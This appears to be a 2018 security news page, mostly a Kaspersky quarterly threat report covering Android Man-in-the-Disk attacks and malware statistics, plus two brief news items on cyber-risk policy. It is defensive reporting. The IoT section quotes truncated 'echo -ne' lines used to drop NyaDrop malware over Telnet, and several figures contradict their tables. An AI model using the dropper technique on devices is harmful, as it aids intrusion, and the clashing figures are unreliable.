One of the security principles built into the Android operating system is that all apps must be isolated from one another. Each app, along with its private files, operate in ‘sandbox’ that can’t be accessed by other apps. The point is to ensure that, even if a malicious app infiltrates your device, it’s unable to access data held by legitimate apps – for example, the username and password for your online banking app, or your message history. Unsurprisingly, hackers try to find ways to circumvent this protection mechanism.
In August, at DEF CON 26, Checkpoint researcher, Slava Makkaveev, discussed a new way of escaping the Android sandbox, dubbed a ‘Man-in-the-Disk’ attack.
Android also has a shared external storage, named External Storage. Apps must ask the device owner for permission to access this storage area – the privileges required are not normally considered dangerous, and nearly every app asks for them, so there is nothing suspicious about the request per se. External storage is used for lots of useful things, such as to exchange files or transfer files between a smartphone and a computer. However, external storage is also often used for temporarily storing data downloaded from the internet. The data is first written to the shared part of the disk, and then transferred to an isolated area that only that particular app can access. For example, an app may temporarily use the area to store supplementary modules that it installs to expand its functionality, additional content such as dictionaries, or updates.
The problem is that any app with read/write access to the external storage can gain access to the files and modify them, adding something malicious. In a real-life scenario, you may install a seemingly harmless app, such as a game, that may nevertheless infect your smartphone with malware. Slava Makkaveev gave several examples in his DEF CON presentation.
Google researchers discovered that the same method of attack could be applied to the Android version of the popular game, Fortnite. To download the game, players need to install a helper app first, and it is supposed to download the game files. However, using the Man-in-the-Disk attack, someone can trick the helper into installing a malicious app. Fortnite developers – Epic Games – have already issued a new version of the installer. So, if you’re a Fortnite player, use version 2.1.0 or later to be sure that you’re safe. If you have Fortnite already installed, uninstall it and then reinstall it from scratch using the new version.
How safe are car sharing apps?
There has been a growth in car sharing services in recent years. Such services clearly provide flexibility for people wanting to get around major cities. However, it raises the question of security – how safe is the personal information of people using these services?
The obvious reason why cybercriminals might be interested in car sharing is because they want to ride in someone’s car at someone else’s expense. But this could be the least likely scenario – it’s a crime that requires a physical point of presence and there are ways to cross check if the person who makes the booking is the one who gets the ride. The selling of hijacked accounts might be a more viable reason – driven by demand from those who don’t have a driving license or who have been refused registration by the car sharing service’s security team. Offers of this nature already exist on the market. In addition, if someone manages to hijack someone else’s car sharing account, they can track all their trips and steal things that are left behind in the car. Finally, a car that is fraudulently rented in somebody else’s name can always be driven to some remote place and cannibalized for spare parts, or used for criminal activity.
We tested 13 apps to see if their developers have considered security.
First, we checked to see if the apps could be launched on an Android device with root privileges and to see how well the code is obfuscated. This is important because most Android apps can be decompiled, their code modified (for example, so that user credentials are sent to a C2 server), then re-assembled, signed with a new certificate and uploaded again to an app store. An attacker on a rooted device can infiltrate the app’s process and gain access to authentication data.
Second, we checked to see if it was possible to create a username and password when using a service. Many services use a person’s phone number as their username. This is quite easy for cybercriminals to obtain as people often forget to hide it on social media, while car sharing customers can be identified on social media by their hashtags and photos.
Third, we looked at how the apps work with certificates and if cybercriminals have any chance of launching successful Man-in-the-Middle attacks. We also checked how easy it is to overlay an app’s interface with a fake authorization window.
The results of our tests were not encouraging. It’s clear that app developers don’t fully understand the current threats to mobile platforms – this is true for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying customers of suspicious activities – only one service currently sends notifications to customers about attempts to log in to their account from a different device. The majority of the apps we analysed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not only very similar to each other but are actually based on the same code.
You can read our report here, including advice for customers of car sharing services and recommendations for developers of car sharing apps.
These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.
According to Kaspersky Security Network:
Kaspersky Lab solutions blocked 947,027,517 attacks launched from online resources located in 203 countries.
246,695,333 unique URLs were recognized as malicious by Web Anti-Virus components.
Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 305,315 users.
Ransomware attacks were registered on the computers of 259,867 unique users.
Our File Anti-Virus logged 239,177,356 unique malicious and potentially unwanted objects.
Kaspersky Lab products for mobile devices detected:
1,305,015 malicious installation packages
55,101 installation packages for mobile banking Trojans
13,075 installation packages for mobile ransomware Trojans.
Perhaps the biggest news of the reporting period was the Trojan-Banker.AndroidOS.Asacub epidemic. It peaked in September when more than 250,000 unique users were attacked – and that only includes statistics for those with Kaspersky Lab’s mobile products installed on their devices.
Number of users attacked by the mobile banker Asacub in 2017 and 2018
The scale of the attack involving Asacub by far surpasses the largest attacks we have previously observed while monitoring mobile threats. The Trojan’s versions have sequential version numbers, suggesting the attacks were launched by just one threat actor. It’s impossible to count the total number of affected users, but it would need to be in the tens of thousands to make such a massive malicious campaign profitable.
Mobile threat statistics
In Q3 2018, Kaspersky Lab detected 1,305,015 malicious installation packages, which is 439,229 more packages than in the previous quarter.
Number of detected malicious installation packages, Q3 2017 – Q3 2018 (download)
Distribution of detected mobile apps by type
Among all the threats detected in Q3 2018, the lion’s share belonged to potentially unwanted RiskTool apps (52.05%); compared to the previous quarter, their share decreased by 3.3 percentage points (p.p.). Members of the RiskTool.AndroidOS.SMSreg family contributed most to this.
Distribution of newly detected mobile apps by type, Q2 – Q3 2018 (download)
Second place was occupied by Trojan-Dropper threats (22.57%), whose share increased by 9 p.p. Most files of this type belonged to the Trojan-Dropper.AndroidOS.Piom, Trojan-Dropper.AndroidOS.Wapnor and Trojan-Dropper.AndroidOS.Hqwar families.
The share of advertising apps continued to decrease and accounted for 6.44% of all detected threats (compared to 8.91% in Q2 2018).
The statistics show that the number of mobile financial threats has been rising throughout 2018, with the proportion of mobile banker Trojans increasing from 1.5% in Q1, to 4.38% of all detected threats in Q3.
TOP 20 mobile malware
1 DangerousObject.Multi.Generic 55.85
2 Trojan.AndroidOS.Boogr.gsh 11.39
3 Trojan-Banker.AndroidOS.Asacub.a 5.28
4 Trojan-Banker.AndroidOS.Asacub.snt 5.10
5 Trojan.AndroidOS.Piom.toe 3.23
6 Trojan.AndroidOS.Dvmap.a 3.12
7 Trojan.AndroidOS.Triada.dl 3.09
8 Trojan-Dropper.AndroidOS.Tiny.d 2.88
9 Trojan-Dropper.AndroidOS.Lezok.p 2.78
10 Trojan.AndroidOS.Agent.rt 2,74
11 Trojan-Banker.AndroidOS.Asacub.ci 2.62
12 Trojan-Banker.AndroidOS.Asacub.cg 2.51
13 Trojan-Banker.AndroidOS.Asacub.ce 2.29
14 Trojan-Dropper.AndroidOS.Agent.ii 1,77
15 Trojan-Dropper.AndroidOS.Hqwar.bb 1.75
16 Trojan.AndroidOS.Agent.pac 1.61
17 Trojan-Dropper.AndroidOS.Hqwar.ba 1.59
18 Exploit.AndroidOS.Lotoor.be 1.55
19 Trojan.AndroidOS.Piom.uwp 1.48
20 Trojan.AndroidOS.Piom.udo 1.36
* This malware rating does not include potentially dangerous or unwanted programs such as RiskTool or adware.
** Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab’s mobile antivirus that were attacked.
First place in our TOP 20 once again went to DangerousObject.Multi.Generic (55.85%), the verdict we use for malware that’s detected using cloud technologies. Cloud technologies work when antivirus databases do not yet contain the data to detect a malicious program but the company’s cloud antivirus database already includes information about the object. This is basically how the very latest malicious programs are detected.
In second place was Trojan.AndroidOS.Boogr.gsh (11.39%). This verdict is given to files that our system recognizes as malicious based on machine learning..
Third and fourth places went to representatives of the Asacub mobile banker family – Trojan-Banker.AndroidOS.Asacub.a (5.28%) and Trojan-Banker.AndroidOS.Asacub.snt (5.10%).
Geography of mobile threats
Map of attempted infections using mobile malware, Q3 2018 (download)
TOP 10 countries by share of users attacked by mobile malware:
1 Bangladesh 35.91
2 Nigeria 28.54
3 Iran 28.07
4 Tanzania 28.03
5 China 25.61
6 India 25.25
7 Pakistan 25.08
8 Indonesia 25.02
9 Philippines 23.07
10 Algeria 22.88
* Countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000) are excluded.
** Unique users attacked in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.
In Q3 2018, Bangladesh (35.91%) retained first place in terms of the share of mobile users attacked. Nigeria (28.54%) came second. Third and fourth places were claimed by Iran (28.07%) and Tanzania (28.03%) respectively.
Mobile banking Trojans
During the reporting period, we detected 55,101 installation packages for mobile banking Trojans, which is nearly 6,000 fewer than in Q2 2018.
The largest contribution was made by Trojans belonging to the family Trojan-Banker.AndroidOS.Hqwar.jck – this verdict was given to 35% of all detected banking Trojans. Trojan-Banker.AndroidOS.Asacub came second, accounting for 29%.
Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q3 2017 – Q3 2018 (download)
1 Trojan-Banker.AndroidOS.Asacub.a 33.27
2 Trojan-Banker.AndroidOS.Asacub.snt 32.16
3 Trojan-Banker.AndroidOS.Asacub.ci 16.51
4 Trojan-Banker.AndroidOS.Asacub.cg 15.84
5 Trojan-Banker.AndroidOS.Asacub.ce 14.46
6 Trojan-Banker.AndroidOS.Asacub.cd 6.66
7 Trojan-Banker.AndroidOS.Svpeng.q 3.25
8 Trojan-Banker.AndroidOS.Asacub.cf 2.07
9 Trojan-Banker.AndroidOS.Asacub.bz 1.68
10 Trojan-Banker.AndroidOS.Asacub.bw 1.68
* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab’s mobile antivirus that were attacked by banking threats.
In Q3 2018, the TOP 10 rating of banking threats was almost exclusively (nine places out of 10) occupied by various versions of Trojan-Banker.AndroidOS.Asacub.
Geography of mobile banking threats, Q3 2018 (download)
TOP 10 countries by share of users attacked by mobile banking Trojans:
1 Russia 2.18
2 South Africa 2.16
3 Malaysia 0.53
4 Ukraine 0.41
5 Australia 0.39
6 China 0.35
7 South Korea 0.33
8 Tajikistan 0.30
9 USA 0.27
10 Poland 0.25
* Countries where the number of users of Kaspersky Lab’s mobile antivirus is relatively small (under 10,000) are excluded.
** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.
In Q3 2018, Russia ended up in first place in this TOP 10 because of the mass attacks involving the Asacub Trojan. The USA, the previous quarter’s leader, fell to ninth (0.27%) in Q3. Second and third place were occupied by South Africa (2.16%) and Malaysia (0.53%) respectively.
Mobile ransomware Trojans
In Q3 2018, we detected 13,075 installation packages for mobile ransomware Trojans, which is 1,044 fewer than in Q2.
Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, Q3 2017 – Q3 2018 (download)
1 Trojan-Ransom.AndroidOS.Svpeng.ag 47.79
2 Trojan-Ransom.AndroidOS.Svpeng.ah 26.55
3 Trojan-Ransom.AndroidOS.Zebt.a 6.71
4 Trojan-Ransom.AndroidOS.Fusob.h 6.23
5 Trojan-Ransom.AndroidOS.Rkor.g 5.50
6 Trojan-Ransom.AndroidOS.Svpeng.snt 3.38
7 Trojan-Ransom.AndroidOS.Svpeng.ab 2.15
8 Trojan-Ransom.AndroidOS.Egat.d 1.94
9 Trojan-Ransom.AndroidOS.Small.as 1.43
10 Trojan-Ransom.AndroidOS.Small.cj 1.23
* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab’s mobile antivirus attacked by ransomware Trojans.
In Q3 2018, the most widespread mobile ransomware Trojans belonged to the Svpeng family – Trojan-Ransom.AndroidOS.Svpeng.ag (47.79%) and Trojan-Ransom.AndroidOS.Svpeng.ah (26.55%). Together, they accounted for three quarters of all mobile ransomware Trojan attacks. The once-popular families Zebt and Fusob were a distant third and fourth, represented by Trojan-Ransom.AndroidOS.Zebt.a (6.71%) and Trojan-Ransom.AndroidOS.Fusob.h (6.23%) respectively.
Geography of mobile ransomware Trojans, Q3 2018 (download)
TOP 10 countries by share of users attacked by mobile ransomware Trojans:
1 USA 1.73
2 Kazakhstan 0.36
3 China 0.14
4 Italy 0.12
5 Iran 0.11
6 Belgium 0.10
7 Switzerland 0.09
8 Poland 0.09
9 Mexico 0.09
10 Romania 0.08
* Countries where the number of users of Kaspersky Lab’s mobile antivirus is relatively small (under 10,000) are excluded.
** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.
Just like in Q2, first place in the TOP 10 went to the United States (1.73%). Kazakhstan (0.6%) rose one place to second in Q3, while China (0.14%) rose from seventh to third.
Attacks on IoT devices
In this quarter’s report, we decided to only present the statistics for Telnet attacks, as this type of attack is used most frequently and employs the widest variety of malware types.
The popularity of attacked services according to the number of unique IP addresses from which attacks were launched, Q3 2018
Geography of IP addresses of devices from which attacks were attempted on Kaspersky Lab honeypots, Q3 2018 (download)
TOP 10 countries hosting devices that were sources of attacks targeting Kaspersky Lab honeypots.
1 China 27.15%
2 Brazil 10.57%
3 Russia 7.87%
4 Egypt 7.43%
5 USA 4.47%
6 South Korea 3.57%
7 India 2.59%
8 Taiwan 2.17%
9 Turkey 1.82%
10 Italy 1.75%
* Infected devices in each country as a percentage of the global number of IoT devices that attack via Telnet.
In Q3, China (23.15%) became the leader in terms of the number of unique IP addresses directing attacks against Kaspersky Lab honeypots. Brazil (10.57%) came second, after leading the rating in Q2. Russia (7.87%) was third.
Successful Telnet attacks saw the threat actors download Downloader.Linux.NyaDrop.b (62.24%) most often. This piece of malware is remarkable in that it contains a shell code that downloads other malware from the same source computer that has just infected the victim IoT device. The shell code doesn’t require any utilities – it performs all the necessary actions within itself using system calls. In other words, NyaDrop is a kind of universal soldier, capable of performing its tasks irrespective of the environment it has been launched in.
It was the Trojans of the family Backdoor.Linux.Hajime that downloaded NyaDrop most frequently, because this is a very convenient self-propagation method for Hajime. The flow chart in this case is of particular interest:
After successfully infecting a device, Hajime scans the network to find new victims.
As soon as a suitable device is found, the lightweight NyaDrop (just 480 bytes) is downloaded to it.
NyaDrop contacts the device that was the infection source and slowly downloads Hajime, which is much larger.
All these actions are only required because it’s quite a challenge to download files via Telnet, though it is possible to execute commands. For example, this is what creating a NyaDrop file looks like:
echo -ne "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00
echo -ne "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00
480 bytes can be sent this way, but sending 60 KB becomes problematic.
TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks
1 Trojan-Downloader.Linux.NyaDrop.b 62.24%
2 Backdoor.Linux.Mirai.ba 16.31%
3 Backdoor.Linux.Mirai.b 12.01%
4 Trojan-Downloader.Shell.Agent.p 1.53%
5 Backdoor.Linux.Mirai.c 1.33%
6 Backdoor.Linux.Gafgyt.ay 1.15%
7 Backdoor.Linux.Mirai.au 0.83%
8 Backdoor.Linux.Gafgyt.bj 0.61%
9 Trojan-Downloader.Linux.Mirai.d 0.51%
10 Backdoor.Linux.Mirai.bj 0.37%
* Proportion of downloads of each specific malicious program to IoT devices in successful Telnet attacks as a percentage of all malware downloads in such attacks.
The rating did not differ much from the previous quarter: half the top 10 is occupied by different modifications of Mirai, which is the most widespread IoT malware program to date.
The banking Trojan DanaBot that was detected in Q2 continued to develop rapidly in Q3. A new modification included not only an updated C&C/bot communication protocol but also an extended list of organizations targeted by the malware. Its prime targets in Q2 were located in Australia and Poland, but in Q3 organizations from Austria, Germany and Italy were also included.
To recap, DanaBot has a modular structure and is capable of loading extra modules to intercept traffic and steal passwords and crypto wallets. The Trojan spread via spam messages containing a malicious office document, which subsequently loaded the Trojan’s main body.
Financial threat statistics
In Q3 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 305,315 users.
Number of unique users attacked by financial malware, Q3 2018 (download)
Geography of attacks
To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, we calculated the share of users of Kaspersky Lab products in each country that faced this threat during the reporting period out of all users of our products in that country.
Geography of banking malware attacks, Q3 2018 (download)
TOP 10 countries by percentage of attacked users
1 Germany 3.0
2 South Korea 2.8
3 Greece 2.3
4 Malaysia 2.1
5 Serbia 2.0
6 United Arab Emirates 1.9
7 Portugal 1.9
8 Lithuania 1.9
9 Indonesia 1.8
10 Cambodia 1.8
* Countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000) are excluded.
** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in that country.
TOP 10 banking malware families
Name Verdicts %*
1 Zbot Trojan.Win32.Zbot 25.8
2 Nymaim Trojan.Win32.Nymaim 18.4
3 SpyEye Backdoor.Win32.SpyEye 18.1
4 RTM Trojan-Banker.Win32.RTM 9.2
5 Emotet Backdoor.Win32.Emotet 5.9
6 Neurevt Trojan.Win32.Neurevt 4.7
7 Tinba Trojan-Banker.Win32.Tinba 2.8
8 NeutrinoPOS Trojan-Banker.Win32.NeutrinoPOS 2.4
9 Gozi Trojan.Win32. Gozi 1.6
10 Trickster Trojan.Win32.Trickster 1.4
* Unique users attacked by the given malware as a percentage of all users that were attacked by banking threats.
In Q3 2018, there were three newcomers to this TOP 10: Trojan.Win32.Trickster (1.4%), Trojan-Banker.Win32.Tinba (2.8%) and Trojan-Banker.Win32.RTM (9.2%). The latter shot to fourth place thanks to a mass mailing campaign in mid-July that involved emails with malicious attachments and links.
Overall, the TOP 3 remained the same, though Trojan.Win32.Nymaim ceded some ground – from 27% in Q2 to 18.4% in Q3 – and fell to second.
In early July, Kaspersky Lab experts detected an unusual modification of the notorious Rakhni Trojan. What drew the analysts’ attention was that in some cases the downloader now delivers a miner instead of ransomware as was always the case with this malware family in the past.
August saw the detection of the rather unusual KeyPass ransomware. Its creators apparently decided to make provisions for all possible infection scenarios – via spam, with the help of exploit packs, and via manual brute-force attacks on the passwords of the remote access system, after which the Trojan is launched. The KeyPass Trojan can run in both hidden mode and GUI mode so the threat actor can configure encryption parameters.
Meanwhile, law enforcement agencies continue their systematic battle against ransomware. Following several years of investigations, two cybercriminals who distributed the CoinVault ransomware were found guilty in the Netherlands.
Number of new modifications
In Q3, the number of detected cryptoware modifications was significantly lower than in Q2 and close to that of Q1.
Number of new cryptoware modifications, Q4 2017 – Q3 2018 (download)
Number of users attacked by Trojan cryptors
In Q3 2018, Kaspersky Lab products protected 259,867 unique KSN users from Trojan cryptors. The total number of attacked users rose both against Q2 and on a month-on-month basis during Q3. In September, we observed a significant rise in the number of attempted infections, which appears to correlate with people returning from seasonal vacations.
Number of unique users attacked by Trojan cryptors, Q3 2018 (download)
Geography of attacks
Geography of Trojan cryptors attacks, Q3 2018 (download)
TOP 10 countries attacked by Trojan cryptors
1 Bangladesh 5.80
2 Uzbekistan 3.77
3 Nepal 2.18
4 Pakistan 1.41
5 India 1.27
6 Indonesia 1.21
7 Vietnam 1.20
8 Mozambique 1.06
9 China 1.05
10 Kazakhstan 0.84
* Countries with relatively few Kaspersky Lab users (under 50,000) are excluded.
** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in that country.
Most of the places in this rating are occupied by Asian countries. Bangladesh tops the list with 5.8%, followed by Uzbekistan (3.77%) and the newcomer Nepal (2.18%) in third. Pakistan (1.41%) came fourth, while China (1.05%) fell from sixth to ninth and Vietnam (1.20%) fell four places to seventh.
TOP 10 most widespread cryptor families
Name Verdicts %*
1 WannaCry Trojan-Ransom.Win32.Wanna 28.72%
2 (generic verdict) Trojan-Ransom.Win32.Phny 13.70%
3 GandCrab Trojan-Ransom.Win32.GandCrypt 12.31%
4 Cryakl Trojan-Ransom.Win32.Cryakl 9.30%
5 (generic verdict) Trojan-Ransom.Win32.Gen 2.99%
6 (generic verdict) Trojan-Ransom.Win32.Cryptor 2.58%
7 PolyRansom/VirLock Virus.Win32.PolyRansom 2.33%
8 Shade Trojan-Ransom.Win32.Shade 1,99%
9 Crysis Trojan-Ransom.Win32.Crusis 1.70%
10 (generic verdict) Trojan-Ransom.Win32.Encoder 1.70%
* Unique Kaspersky Lab users attacked by a specific family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors.
The leading 10 places are increasingly occupied by generic verdicts, suggesting widespread cryptors are effectively detected by automatic intelligent systems. WannaCry (28.72%) still leads the way among specific cryptoware families. This quarter saw two new versions of the Trojan GandCrab (12.31%) emerge, meaning it remained in the most widespread ransomware rating. Among the old-timers that remained in the TOP 10 were PolyRansom, Cryakl, Shade, and Crysis, while Cerber and Purgen failed to gain much distribution this quarter.
As we already reported in Ransomware and malicious cryptominers in 2016-2018, ransomware is gradually declining and being replaced with cryptocurrency miners. Therefore, this year we decided to start publishing quarterly reports on the status of this type of threat. At the same time, we began using a broader range of verdicts as a basis for collecting statistics on miners, so the statistics in this year’s quarterly reports may not be consistent with the data from our earlier publications.
Number of new modifications
In Q3 2018, Kaspersky Lab solutions detected 31,991 new modifications of miners.
Number of new miner modifications, Q3 2018 (download)
Number of users attacked by cryptominers
In Q3, Kaspersky Lab products detected mining programs on the computers of 1,787,994 KSN users around the world.
Number of unique users attacked by cryptominers, Q3 2018 (download)
Cryptomining activity in September was comparable to that of June 2018, though we observed an overall downward trend in Q3.
Geography of attacks
Geography of cryptominers, Q3 2018 (download)
TOP 10 countries by percentage of attacked users
1 Afghanistan 16.85%
2 Uzbekistan 14.23%
3 Kazakhstan 10.17%
4 Belarus 9.73%
5 Vietnam 8.96%
6 Indonesia 8.80%
7 Mozambique 8.50%
8 Ukraine 7.60%
9 Tanzania 7.51%
10 Azerbaijan 7.13%
* Countries with relatively few Kaspersky Lab product users (under 50,000) are excluded.
** Unique Kaspersky Lab users whose computers were targeted by miners as a percentage of all unique users of Kaspersky Lab products in the country.
Vulnerable apps used by cybercriminals
The distribution of platforms most often targeted by exploits showed very little change from Q2. Microsoft Office applications (70%) are still the most frequently targeted – five times more than web browsers, the second most attacked platform.
Although quite some time has passed since security patches were released for the two vulnerabilities most often used in cyberattacks – CVE-2017-11882 and CVE-2018-0802 – the exploits targeting the Equation Editor component still remain the most popular for sending malicious spam messages.
An exploit targeting the vulnerability CVE-2018-8373 in the VBScript engine (which was patched in late August) was detected in the wild and affected Internet Explorer 9–11. However, we are currently observing only limited use of this vulnerability by cybercriminals. This is most probably due to Internet Explorer not being very popular, as well as the fact that VBScript execution is disabled by default in recent versions of Windows 10.
Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2018 (download)
Q3 was also marked by the emergence of two atypical 0-day vulnerabilities – CVE-2018-8414 and CVE-2018-8440. They are peculiar because information about the existence of these vulnerabilities, along with detailed descriptions and all the files required to reproduce them, was leaked to the public domain long before official patches were released for them.
In the case of CVE-2018-8414, an article was published back in June with a detailed description of how SettingContent-ms files can be used to execute arbitrary code in Windows. However, the security patch to fix this vulnerability was only released in Q3, one month after the article became publicly available and active exploitation of the vulnerability had already began. The researchers who described this technique reported it to Microsoft, but initially it was not recognized as a vulnerability requiring a patch. Microsoft reconsidered after cybercriminals began actively using these files to deliver malicious payloads, and a patch was released on July 14. According to KSN statistics, the SettingContent-ms files didn’t gain much popularity among cybercriminals, and after the security patch was released, their use ceased altogether.
Another interesting case was the CVE-2018-8440 security breach. Just like in the case above, all the information required for reproduction was deliberately published by a researcher, and threat actors naturally took advantage. CVE-2018-8440 is a privilege-escalation vulnerability, allowing an attacker to escalate their privilege in the system to the highest level – System. The vulnerability is based on how Windows processes a task scheduler advanced local procedure call (ALPC). The vulnerable ALPC procedure makes it possible to change the discretionary access control list (DACL) for files located in a directory that doesn’t require special privileges to access. To escalate privileges, the attacker exploits the vulnerability in the ALPC to change access rights to a system file, and then that system file is overwritten by an unprivileged user.
Attacks via web resources
The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are created by cybercriminals, while web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.
Countries where online resources are seeded with malware
The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.
In the third quarter of 2018, Kaspersky Lab solutions blocked 947,027,517 attacks launched from web resources located in 203 countries around the world. 246,695,333 unique URLs were recognized as malicious by web antivirus components.
Distribution of web attack sources by country, Q3 2018 (download)
In Q3, the USA (52.81%) was home to most sources of web attacks. Overall, the leading four sources of web attacks remained unchanged from Q2: the USA is followed by the Netherlands (16.26%), Germany (6.94%) and France (4.4%).
Countries where users faced the greatest risk of online infection
To assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered in each country during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.
This rating only includes attacks by malware-class malicious programs; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.
1 Venezuela 35.88
2 Albania 32.48
3 Algeria 32.41
4 Belarus 31.08
5 Armenia 29.16
6 Ukraine 28.67
7 Moldova 28.64
8 Azerbaijan 26.67
9 Kyrgyzstan 25.80
10 Serbia 25.38
11 Mauritania 24.89
12 Indonesia 24.68
13 Romania 24.56
14 Qatar 23.99
15 Kazakhstan 23.93
16 Philippines 23.84
17 Lithuania 23.70
18 Djibouti 23.70
19 Latvia 23.09
20 Honduras 22.97
* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded.
** Unique users targeted by malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.
On average, 18.92% of internet users’ computers worldwide experienced at least one malware-class web attack.
Geography of malicious web attacks in Q3 2018 (download)
Local infection statistics for user computers are an important indicator: they reflect threats that have penetrated computer systems by infecting files or via removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).
Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. Analysis takes account of the malicious programs identified on user computers or on removable media connected to computers – flash drives, camera memory cards, phones and external hard drives.
In Q3 2018, Kaspersky Lab’s file antivirus detected 239,177,356 unique malicious and potentially unwanted objects.
Countries where users faced the highest risk of local infection
For each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.
The rating includes only malware-class attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.
1 Uzbekistan 54.93
2 Afghanistan 54.15
3 Yemen 52.12
4 Turkmenistan 49.61
5 Tajikistan 49.05
6 Laos 47.93
7 Syria 47.45
8 Vietnam 46.07
9 Bangladesh 45.93
10 Sudan 45.30
11 Ethiopia 45.17
12 Myanmar 44.61
13 Mozambique 42.65
14 Kyrgyzstan 42.38
15 Iraq 42.25
16 Rwanda 42.06
17 Algeria 41.95
18 Cameroon 40.98
19 Malawi 40.70
20 Belarus 40.66
* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded.
** Unique users on whose computers malware-class local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country.
Geography of malicious web attacks in Q3 2018 (download)
On average, 22.53% of computers globally faced at least one malware-class local threat in Q3.
Cyberattacks Top Risk to Business in North America, EAP, Europe: WEF
12.11.2018 securityweek BigBrothers
Cyberattacks are seen as the top risk to doing business in Europe, North America, and the East Asia and Pacific (EAP) region, according to a report published on Monday by the World Economic Forum (WEF).
The WEF’s Regional Risks for Doing Business report provides insights based on a survey of 12,000 private sector decision-makers from roughly 130 countries.
The study shows that, globally, cyberattacks are the 5th biggest concern, after unemployment/underemployment, failure of national governance, energy price shock, and fiscal crises. Cyberattacks are seen as a bigger risk to doing business compared to the previous year, when they were on the 8th position.
“This is no surprise,” the WEF wrote in its report. “A number of massive cyber-attacks took place in 2017 – notably WannaCry, Petya and NotPetya – causing extensive operational disruption and financial losses for organizations around the world. We will look back at 2017 as the year that the world began to take seriously the potential extent of our vulnerability to cyber-attack disruptions. In our survey, ‘cyber-attacks’ tended to be flagged as a concern in the world’s more advanced economies.”World Economic Forum releases report on risk for businesses
Cyberattacks were named the top risk in Europe, specifically in 12 European countries. The list includes Germany and the United Kingdom, both of which were badly hit by the WannaCry attack. The WEF also pointed out that the number of cyberattacks in the region has increased significantly in the first quarter of 2018 compared to the same period in 2017.
Cyberattacks are also the top concern in the East Asia and the Pacific region, which includes countries such as Australia, China, North and South Korea, Japan, Singapore and Malaysia.
“The prominence of cyber-attacks as a concern among the region’s businesses reflects the rapid pace of digitization and the increasing sophistication of the region’s economies. South-East Asia in particular is the fastest-growing region in the world in terms of connections to the internet, with a projected 3.8 million new users each month, and estimates that its online economy will reach $200 billion by 2025. These trends make the region a target for criminal and terrorist hackers,” the WEF said.
In North America –- specifically in the United States and Canada, as Mexico has been grouped with Latin America — cyberattacks are the top concern of businesses, followed by data fraud or theft.
“This mirrors the pattern in other economically advanced regions, highlighting the growing reliance of global commerce on digital networks that are the target of increasingly sophisticated and prolific attacks. In this regard, 2017 is likely to mark a watershed, with a series of massive cyber-attacks highlighting the mounting dangers from hackers and the need to bolster public and corporate defences,” the report explains.
In the Middle East and North Africa region, cyberattacks are ranked 6th. However, the United Arab Emirates, which the WEF has described as a “regional outlier,” did rank cyberattacks first. Technology misuse and data fraud are also major concerns in the UAE, on the third and fourth positions, respectively.
In South Asia, cyberattacks ranked 5th, but they represent the main concern in India, the region’s largest country. WEF noted that India is the third in the world — after the U.S. and China — in terms of the volume of detected cyber threats.
It’s worth noting that in Eurasia, sub-Saharan Africa, and Latin America cyberattacks did not make it into the top ten risks.
France Seeks Global Talks on Cyberspace Security
12.11.2018 securityweek BigBrothers
The French government announced Monday a "Paris Call" for talks to lay out a common framework for ensuring internet security, following a surge in cyberattacks which has dented confidence in global networks.
The move aims to relaunch negotiations on a "code of good conduct" which have stalled since last year. Officials said the text, to be presented by President Emmanuel Macron as he opens UNESCO's Internet Governance Forum in Paris on Monday, has been signed by most European countries.
But China, Russia and the United States have not yet joined, though a source in Macron's office said a "critical mass" of US players support the call, including Microsoft and the NGO Internet Society.
The identity and number of signatories are to be released later Monday, following a lunch hosted at the Elysee Palace by Macron for dozens of technology executives and officials.
"To respect people's rights and protect them online as they do in the physical world, states must work together, but also collaborate with private-sector partners, the world of research and civil society," according to the text.
Moscow's alleged cyber-meddling in US elections, huge data breaches at social media and other online companies, and malware attacks like WannaCry and NotPetya have fuelled a new sense of urgency among governments.
